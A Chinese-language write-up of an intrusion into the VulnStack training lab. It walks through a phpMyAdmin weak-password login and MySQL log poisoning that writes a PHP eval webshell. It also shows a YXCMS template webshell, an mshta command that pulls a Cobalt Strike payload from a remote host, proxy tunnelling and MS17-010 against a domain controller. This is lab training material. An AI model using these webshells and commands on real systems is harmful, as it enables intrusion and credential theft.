文章目录
一、环境配置
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
网络拓扑:
备注:
1.靶场虚拟机密码为hongrisec@2019,登录时密码可能会过期,修改密码后重新登录即可。
2.web搭建需要自行到C:\phpStudy目录中启动phpStudy。第一次启动phpStudy会报错无法启动,重启一次系统后即可正常运行。
二、外网打点
使用nmap进行端口扫描
思路1
访问80端口,存在phpstudy探针,可获得网站绝对路径。
C:/phpStudy/WWW
目录扫描发现phpmyadmin,尝试弱口令root/root登录
成功使用弱口令进入phpmyadmin管理端
查看是否有导入权限,有导入权限可直接写入木马。查询结果secure_auth为OFF,没有导入权限。
#查看数据库是否有导入权限
SHOW GLOBAL VARIABLES LIKE '%secure%';
可通过将一句话木马写入到日志文件内getshell
#查看是否有开启日志记录
SHOW GLOBAL VARIABLES LIKE '%general%';
查询到general_log为OFF,日志记录功能关闭,但是我们可以手动开启日志功能
#开启日志并更改日志文件
SET GLOBAL general_log = ON;
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/shell.php';
#查询当前日志状态
SHOW GLOBAL VARIABLES LIKE '%general%';
# 往日志里面写入PHP一句话
select '<?php @eval($_POST[cmd]);?>';
成功getshell
思路2
存在YXCMS,网站公告给出了默认后台地址和账号密码,尝试登录。
点击前台模板管理-管理模板文件
新增一个模板,内容写入一句话木马
shell的路径为:http://192.168.30.128/yxcms/protected/apps/default/view/default/shell.php
成功getshell。
三、横向移动
1.内网信息收集
上线CS
使用脚本生成木马
上线命令:mshta http://xx.xx.xx.xx:80/java
抓取明文密码
fscan内网探测,发现内网两台主机存在MS17-010漏洞,其中一台是域控
2.隧道搭建
使用CS自带的隧道功能搭建隧道(也可使用其他的隧道工具)
kali里面修改代理配置文件,配置你的代理服务器
vi /etc/proxychains4.conf
让msf的流量通过代理
proxychains msfconsole
3.MS17-010获取域成员权限-192.168.52.141
4.MS17-010获取域控权限-192.168.52.138